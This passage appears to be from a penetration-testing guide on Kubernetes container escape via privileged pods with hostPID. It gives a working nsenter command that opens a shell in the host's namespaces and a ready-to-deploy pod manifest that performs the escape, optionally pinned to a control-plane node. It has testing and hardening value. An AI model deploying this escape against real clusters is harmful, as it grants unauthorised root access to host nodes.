# Pod Escape Privileges

## Privileged and hostPID

With these privileges you will have **access to the hosts processes** and **enough privileges to enter inside the namespace of one of the host processes**.\
Note that you can potentially not need privileged but just some capabilities and other potential defenses bypasses (like apparmor and/or seccomp).

Just executing something like the following will allow you to escape from the pod:

```bash
nsenter --target 1 --mount --uts --ipc --net --pid -- bash
```

Configuration example:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: priv-and-hostpid-exec-pod
  labels:
    app: pentest
spec:
  hostPID: true
  containers:
  - name: priv-and-hostpid-pod
    image: ubuntu
    tty: true
    securityContext:
      privileged: true
    command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
  #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
```

## Privileged only